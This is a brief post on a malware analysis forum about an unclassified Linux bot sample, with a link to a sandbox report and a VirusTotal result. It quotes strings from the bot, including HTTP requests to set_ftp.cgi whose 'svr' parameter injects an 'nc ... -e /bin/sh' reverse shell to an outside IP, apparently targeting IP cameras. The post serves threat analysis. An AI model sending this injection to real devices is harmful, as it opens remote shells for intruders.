A forum for reverse engineering, OS internals and malware analysis 

Linux Unclassified Bot

Forum for analysis and discussion about malware.

Linux Unclassified Bot

 #30605  by K_Mikhail
 Sat Jul 15, 2017 7:42 pm
Hello!

Found on: https://detux.org/report.php?sha256=8c5 ... decdb4751a
Code: Select all
GET /set_ftp.cgi?loginuse=
&loginpas=
&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28nc+11.11.11.111+1234+-e+%2Fbin%2Fsh%29 HTTP/1.0
GET /ftptest.cgi?loginuse=
GET login.cgi HTTP/1.0
login
abcdefghijklmnop012345
[0/56]: https://www.virustotal.com/file/8c56e29 ... /analysis/
 Return to “Malware”